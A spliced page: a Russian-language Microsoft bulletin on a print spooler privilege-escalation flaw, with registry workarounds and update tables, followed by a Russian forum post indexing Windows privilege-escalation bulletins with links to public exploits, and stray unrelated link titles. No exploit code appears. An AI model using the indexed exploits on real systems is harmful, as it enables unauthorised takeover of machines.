К смягчающим факторам относятся параметр, стандартная конфигурация или общие рекомендации, которые при использовании по умолчанию могут снизить опасность использования уязвимости. Следующие смягчающие факторы могут снизить опасность использования уязвимости.

  • Чтобы воспользоваться этой уязвимостью, злоумышленник должен иметь действительные учетные данные и возможность входа в систему.

Временные решения

К временным решениям относятся изменения параметров или конфигурации, не приводящие к полному устранению уязвимости, но позволяющие блокировать известные направления атак до того, как будет установлено обновление. Корпорация Майкрософт проверила представленные ниже временные решения и сообщила, снижают ли они функциональные возможности.

  • Отключите службу очереди печати принтера

    Отключение службы очереди печати принтера поможет защитить систему от попыток воспользоваться данной уязвимостью. Чтобы отключить службу диспетчера печати, выполните следующие действия.

    Интерактивный способ:

    Внимание! Неправильное использование редактора реестра может привести к серьезным проблемам, для решения которых может потребоваться переустановка операционной системы. Корпорация Майкрософт не может гарантировать, что вы сумеете устранить проблемы, возникшие вследствие неправильного использования редактора реестра. Ответственность за использование редактора реестра несет пользователь.

    1. В меню Пуск выберите пункт Выполнить, введите команду regedit и нажмите кнопку ОК.

    2. В редакторе реестра откройте следующий раздел реестра:

      HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservices

    3. Выберите Print Spooler, а затем в меню Файл щелкните Экспорт.

    4. В диалоговом окне Экспорт файла реестра введите spooler_configuration_backup.reg и нажмите кнопку Сохранить.

    5. Дважды щелкните параметр реестра Start типа DWORD, задайте ему значение 4, а затем нажмите кнопку ОК.

    6. Откройте окно командной строки с правами администратора и выполните следующую команду:

      sc stop spooler

    Применение сценария управляемого развертывания:

    1. Создайте резервную копию разделов реестра с помощью управляемого сценария развертывания, используя следующую команду:

      regedit /e spooler_configuration_backup.reg HKEY_LOCAL_MACHINESystemCurrentControlSetServicesspooler

    2. Создайте текстовый файл с именем Disable_spooler.reg следующего содержания:

      Редактор реестра Windows версии 5.00[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSpooler]"Start"=dword:00000004

    3. С помощью следующей команды запустите на целевом компьютере ранее созданный (см. п. 2) сценарий реестра:

      Regedit /s Disable_spooler.reg

    4. Откройте окно командной строки с правами администратора и выполните следующую команду:

      sc stop spooler

    Побочные эффекты использования временного решения. Связанные с печатью компоненты не будут правильно функционировать; печать будет отключена.

    Отмена временного решения.

    Чтобы интерактивно отменить данное временное решение (если оно применено), выполните указанные ниже действия.

    1. В меню Пуск выберите пункт Выполнить, введите команду regedit и нажмите кнопку ОК.
    2. Щелкните меню Файл и выберите Импорт.
    3. В диалоговом окне Импорт файла реестра выберите созданный файл резервной копии реестра (spooler_configuration_backup.reg) и нажмите Открыть.

    Чтобы отменить данное временное решение (если оно применено), с помощью сценария управляемого развертывания, в окне командной строки, открытом с правами администратора, выполните следующую команду:

    Regedit /s spooler_configuration_backup.reg

Часто задаваемые вопросы

Какова область воздействия этой уязвимости?
Эта уязвимость может приводить к несанкционированному повышению привилегий.

В чем причина уязвимости?
Данная уязвимость возникает, когда диспетчер печати Windows неправильно высвобождает память при удалении подключения принтера.

Что такое диспетчер печати (служба очереди печати принтера)?
Служба очереди печати принтера (Spoolsv.exe) представляет собой исполняемый файл, установленный как служба. Служба очереди печати принтера загружается при запуске операционной системы и продолжает работать до завершения работы операционной системы. Служба очереди печати принтера управляет процессом печати, который включает выполнение таких задач, как получение данных о местоположении драйвера принтера, загрузка драйвера, вызовы высокоуровневой функции очереди печати в задание печати и планирование заданий печати. Когда все этапы задания печати выполнены, служба очереди печати передает задание маршрутизатору печати. Дополнительные сведения см. в статье Как работает сетевая печать.

Что может сделать злоумышленник, который воспользуется этой уязвимостью?
Злоумышленник, который воспользуется этой уязвимостью, сможет войти в систему пользователя с системными привилегиями и запустить в ней произвольный код. Воспользовавшись этой уязвимостью, злоумышленник может установить полный контроль над системой. После этого злоумышленник сможет устанавливать программы, просматривать, изменять и удалять данные, а также создавать новые учетные записи.

Каким образом злоумышленник может воспользоваться этой уязвимостью?
Злоумышленник может воспользоваться данной уязвимостью, удалив подключение принтера.

Какие системы в первую очередь подвержены риску?
В первую очередь данной уязвимости подвержены рабочие станции и серверы.

Как действует обновление?
Это обновление устраняет указанную уязвимость, исправляя способ выделения памяти в диспетчере печати Windows при удалении подключения принтера.

Была ли эта уязвимость опубликована до выпуска настоящего бюллетеня по безопасности?
Нет. Корпорация Майкрософт получила сведения об этой уязвимости из надежных источников.

Получала ли корпорация Майкрософт к моменту выпуска этого бюллетеня по безопасности какие-либо сведения о том, что эта уязвимость была использована злоумышленниками?
Нет. Корпорация Майкрософт не получала никакой информации, указывающей на то, что до выпуска этого бюллетеня по безопасности данная уязвимость была открыто использована для организации атак на пользовательские компьютеры.

Сведения об обновлении

Руководство и средства по диагностике и развертыванию


Доступно несколько ресурсов, чтобы помочь администраторам развернуть обновления для системы безопасности.

  • Анализатор безопасности Microsoft Baseline Security Analyzer (MBSA) позволяет администраторам проверять локальные и удаленные системы с целью выявления неустановленных обновлений для системы безопасности и типичных ошибок в конфигурации системы безопасности.
  • Службы Windows Server Update Services (WSUS), Systems Management Server (SMS) и System Center Configuration Manager (SCCM) помогают администраторам распространять обновления для системы безопасности.
  • Компоненты средства оценки совместимости с обновлениями, включенные в набор средств для обеспечения совместимости приложений, облегчают тестирование и проверку совместимости обновлений Windows с установленными приложениями.

Информацию об этих и других доступных инструментах см. в статье Инструменты обеспечения безопасности.

Развертывание обновления для системы безопасности


Подвержены уязвимости

Чтобы получить сведения о нужной версии обновления для системы безопасности, щелкните соответствующую ссылку.

Windows Vista (все выпуски)

Вспомогательная таблица

В приведенной ниже таблице приведены сведения об обновлении для системы безопасности данного программного обеспечения.

Имена файлов обновления для системы безопасности Для всех поддерживаемых 32-разрядных версий Windows Vista:
Windows6.0-KB2839894-x86.msu
Для всех поддерживаемых версий Windows XP Professional x64 Edition:
Windows6.0-KB2839894-x64.msu
Параметры установки См. статью 934307 базы знаний Майкрософт
Необходимость перезагрузки После установки данного обновления для системы безопасности компьютер необходимо перезагрузить.
Сведения об удалении Программа WUSA.exe не поддерживает удаление обновлений. Чтобы удалить обновление, установленное программой WUSA, в панели управления откройте раздел Безопасность. В разделе «Центр обновления Windows» выберите пункт Просмотр установленных обновлений и выберите нужное из списка обновлений.
Сведения о файлах См. статью 2839894 базы знаний Майкрософт
Проверка разделов реестра Примечание. Раздел реестра, позволяющий проверить наличие этого обновления, не существует.

Windows Server 2008, все выпуски

Вспомогательная таблица

В приведенной ниже таблице приведены сведения об обновлении для системы безопасности данного программного обеспечения.

Имена файлов обновления для системы безопасности Для всех поддерживаемых 32-разрядных версий Windows Server 2008:
Windows6.0-KB2839894-x86.msu
Для всех поддерживаемых 64-разрядных (x64) версий Windows Server 2008:
Windows6.0-KB2839894-x64.msu
Все поддерживаемые выпуски Windows Server 2008 для систем на базе процессоров Itanium
Windows6.0-KB2839894-ia64.msu
Параметры установки См. статью 934307 базы знаний Майкрософт
Необходимость перезагрузки После установки данного обновления для системы безопасности компьютер необходимо перезагрузить.
Сведения об удалении Программа WUSA.exe не поддерживает удаление обновлений. Чтобы удалить обновление, установленное программой WUSA, в панели управления откройте раздел Безопасность. В разделе «Центр обновления Windows» выберите пункт Просмотр установленных обновлений и выберите нужное из списка обновлений.
Сведения о файлах См. статью 2839894 базы знаний Майкрософт
Проверка разделов реестра Примечание. Раздел реестра, позволяющий проверить наличие этого обновления, не существует.

Windows 7 (все выпуски)

Вспомогательная таблица

В приведенной ниже таблице приведены сведения об обновлении для системы безопасности данного программного обеспечения.

Имя файла обновления для системы безопасности Для всех поддерживаемых 32-разрядных выпусков Windows 7:
Windows6.1-KB2839894-x86.msu
Для всех поддерживаемых 64-разрядных (x64) выпусков Windows 7:
Windows6.1-KB2839894-x64.msu
Параметры установки См. статью 934307 базы знаний Майкрософт
Необходимость перезагрузки После установки данного обновления для системы безопасности компьютер необходимо перезагрузить.
Сведения об удалении Чтобы удалить обновление, установленное программой WUSA, воспользуйтесь параметром установки /Uninstall или откройте панель управления, выберите Система и безопасность, а затем в разделе «Центр обновления Windows» щелкните Просмотр установленных обновлений и выберите в списке нужные обновления.
Сведения о файлах См. статью 2839894 базы знаний Майкрософт
Проверка разделов реестра Примечание. Раздел реестра, позволяющий проверить наличие этого обновления, не существует.

Windows Server 2008 R2 (все выпуски)

Вспомогательная таблица

В приведенной ниже таблице приведены сведения об обновлении для системы безопасности данного программного обеспечения.

Имя файла обновления для системы безопасности Для всех поддерживаемых 64-разрядных версий Windows Server 2008 R2:
Windows6.1-KB2839894-x64.msu
Для всех поддерживаемых выпусков Windows Server 2008 R2 для систем на базе процессоров Itanium:
Windows6.1-KB2839894-ia64.msu
Параметры установки См. статью 934307 базы знаний Майкрософт
Необходимость перезагрузки После установки данного обновления для системы безопасности компьютер необходимо перезагрузить.
Сведения об удалении Чтобы удалить обновление, установленное программой WUSA, воспользуйтесь параметром установки /Uninstall или откройте панель управления, выберите Система и безопасность, а затем в разделе «Центр обновления Windows» щелкните Просмотр установленных обновлений и выберите в списке нужные обновления.
Сведения о файлах См. статью 2839894 базы знаний Майкрософт
Проверка разделов реестра Примечание. Раздел реестра, позволяющий проверить наличие этого обновления, не существует.

Windows 8 (все версии)

Вспомогательная таблица

В приведенной ниже таблице приведены сведения об обновлении для системы безопасности данного программного обеспечения.

Имя файла обновления для системы безопасности Для всех поддерживаемых 32-разрядных выпусков Windows 8:
Windows8-RT-KB2839894-x86.msu
Для всех поддерживаемых 64-разрядных выпусков Windows 8:
Windows8-RT-KB2839894-x64.msu
Параметры установки См. статью 934307 базы знаний Майкрософт
Необходимость перезагрузки После установки данного обновления для системы безопасности компьютер необходимо перезагрузить.
Сведения об удалении Чтобы удалить обновление, установленное программой WUSA, воспользуйтесь параметром установки /Uninstall или откройте панель управления, выберите Система и безопасность, а затем в разделе Центр обновления Windows под записью «См. также» щелкните Установленные обновления и выберите в списке нужные обновления.
Сведения о файлах См. статью 2839894 базы знаний Майкрософт
Проверка разделов реестра Примечание. Раздел реестра, позволяющий проверить наличие этого обновления, не существует.

Windows Server 2012 (все версии)

Вспомогательная таблица

В приведенной ниже таблице приведены сведения об обновлении для системы безопасности данного программного обеспечения.

Имя файла обновления для системы безопасности Все поддерживаемые выпуски Windows Server 2012:
Windows8-RT-KB2839894-x64.msu
Параметры установки См. статью 934307 базы знаний Майкрософт
Необходимость перезагрузки После установки данного обновления для системы безопасности компьютер необходимо перезагрузить.
Сведения об удалении Чтобы удалить обновление, установленное программой WUSA, воспользуйтесь параметром установки /Uninstall или откройте панель управления, выберите Система и безопасность, а затем в разделе Центр обновления Windows под записью «См. также» щелкните Установленные обновления и выберите в списке нужные обновления.
Сведения о файлах См. статью 2839894 базы знаний Майкрософт
Проверка разделов реестра Примечание. Раздел реестра, позволяющий проверить наличие этого обновления, не существует.

Windows RT (все выпуски)

В приведенной ниже таблице приведены сведения об обновлении для системы безопасности данного программного обеспечения.

Развертывание Это обновление доступно только в Центре обновления Windows.
Необходимость перезагрузки После установки данного обновления для системы безопасности компьютер необходимо перезагрузить.
Сведения об удалении Откройте Панель управления, выберите Система и безопасность, в разделе Центр обновления Windows под записью «См. также» щелкните Установленные обновления и выберите нужное обновление из списка.
Сведения о файлах См. статью 2839894 базы знаний Майкрософт

Прочие сведения

Программа Microsoft Active Protections Program (MAPP)

Чтобы повысить уровень защиты пользователей, корпорация Майкрософт предоставляет сведения об уязвимостях крупным поставщикам программного обеспечения безопасности перед ежемесячным выпуском обновлений. Эта информация необходима им для усовершенствования программного обеспечения и оборудования для защиты пользователей (антивирусных программ, сетевых систем обнаружения вторжений, а также индивидуальных систем предотвращения вторжений). Сведения о средствах защиты, предоставляемых поставщиками программного обеспечения безопасности, доступны на соответствующих веб-сайтах партнеров, перечисленных в списке партнеров MAPP.

Поддержка

Получение справки и поддержки по данному обновлению для системы безопасности

  • Справка по установке обновлений: Поддержка Центра обновления Майкрософт
  • Решения безопасности для ИТ-специалистов: Устранение неполадок и поддержка на веб-сайте TechNet
  • Защита компьютера с установленной ОС Windows от вирусов и вредоносных программ: Центр решений по антивирусам и безопасности
  • Местная поддержка в зависимости от страны: Международная поддержка

Заявление об отказе

Сведения в статьях базы знаний Майкрософт предоставляются без каких-либо гарантий. Корпорация Майкрософт не предоставляет каких-либо гарантий, явных или подразумеваемых, включая любые гарантии товарности или пригодности для использования в определенных целях. Корпорация Майкрософт и ее поставщики ни при каких обстоятельствах не несут ответственности за возможный ущерб, включая косвенный, случайный, прямой, опосредованный и специальный ущерб, а также упущенную выгоду, даже если корпорация Майкрософт или ее поставщики заранее были извещены о возможности такого ущерба. Если действующее законодательство не допускает отказа от ответственности за косвенный или случайный ущерб, то описанные выше ограничения не действуют.

Редакции

  • Версия 1.0 (11 июня 2013 г.) Бюллетень опубликован.
  • Вер. 1.1 (16 декабря 2013 г.): В новую версию бюллетеня добавлена информация об изменении логики обнаружения, чтобы устранить проблему предоставления обновления 2839894 для Windows RT. Это изменение касается только логики обнаружения. В файлы обновления изменения не вносились. Пользователям, успешно установившим это обновление ранее, не требуется выполнять никаких действий.

Built at 2014-04-18T01:50:00Z-07:00

Всем привет! В этой статье, я хочу дать информацию, о способах повышения привилегий на различных дистрибутивах Windows. К тому же, ниже вы найдете ссылки на различные источники, содержащие необходимые эксплойты.

upload_2017-5-24_20-45-1.png

Operating System: Windows Server 2016

Description: Windows Kernel Mode Drivers

Security Bulletin: MS16-135

KB: 3199135

Exploit: github
exploit

Operating System: Windows Server 2008 ,7,8,10 Windows Server 2012

Description: Secondary Logon Handle

Security Bulletin: MS16-032

KB: 3143141

Exploit: github

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Operating System: Windows Server 2008, Vista, 7

Description: WebDAV

Security Bulletin: MS16-016

KB: 3136041

Exploit: Github

Operating System:

Windows Server 2003, Windows Server 2008, Windows 7, Windows 8, Windows 2012

Description: Windows Kernel Mode Drivers

Security Bulletin: MS15-051

KB: 3057191

Exploit: GitHub

Ссылка скрыта от гостей

Operating System: Windows Server 2003, Windows Server 2008, Windows Server 2012, 7, 8

Description: Win32k.sys

Security Bulletin: MS14-058

KB: 3000061

Exploit: GitHub

Ссылка скрыта от гостей

Operating System: Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012

Description: AFD Driver

Security Bulletin: MS14-040

KB: 2975684

Exploit:

Ссылка скрыта от гостей


Ссылка скрыта от гостей

Ссылка скрыта от гостей

Github

Operating System: Windows XP, Windows Server 2003

Description: Windows Kernel

Security Bulletin: MS14-002

KB: 2914368

Exploit:

Ссылка скрыта от гостей

Operating System: Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012

Description: Kernel Mode Driver

Security Bulletin: MS13-005

KB: 2778930

Exploit:

Ссылка скрыта от гостей


Ссылка скрыта от гостей

GitHub

Operating System: Windows Server 2008, 7

Description: Task Scheduler

Security Bulletin: MS10-092

KB: 2305420

Exploit:

Ссылка скрыта от гостей


Ссылка скрыта от гостей

Operating System: Windows Server 2003, Windows Server 2008, 7, XP

Description: KiTrap0D

Security Bulletin: MS10-015

KB: 977165

Exploit:

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Operating System: Windows Server 2003, XP

Description: NDProxy

Security Bulletin: MS14-002

KB: 2914368

Exploit:

Ссылка скрыта от гостей


Ссылка скрыта от гостей

Ссылка скрыта от гостей

Github

Operating System: Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012

Description: Kernel Driver

Security Bulletin: MS15-061

KB: 3057839

Exploit: Github

Operating System:

Windows Server 2003, XP

Description: AFD.sys

Security Bulletin: MS11-080

KB: 2592799

Exploit:

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Operating System: Windows Server 2003, XP

Description: NDISTAPI

Security Bulletin: MS11-062

KB: 2566454

Exploit:

Ссылка скрыта от гостей

Operating System:

Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012

Description: RPC

Security Bulletin: MS15-076

KB: 3067505

Exploit: Github

Operating System: Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012

Description: Hot Potato

Security Bulletin: MS16-075

KB: 3164038

Exploit: GitHub


PowerShell
HotPotato

Operating System: Windows Server 2003, Windows Server 2008, 7, XP

Description: Kernel Driver

Security Bulletin: MS15-010

KB: 3036220

Exploit:

Ссылка скрыта от гостей

Operating System: Windows Server 2003, Windows Server 2008, 7, XP

Description: AFD.sys

Security Bulletin: MS11-046

KB: 2503665

Exploit:

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Like this post? Please share to your friends:
  • Подбор драйверов для windows 10 онлайн
  • Подготовка usb для установки windows 10
  • Повышение прав в командной строке windows 10
  • Подбор windows по параметрам компьютера онлайн
  • Повышение громкости микрофона на windows 10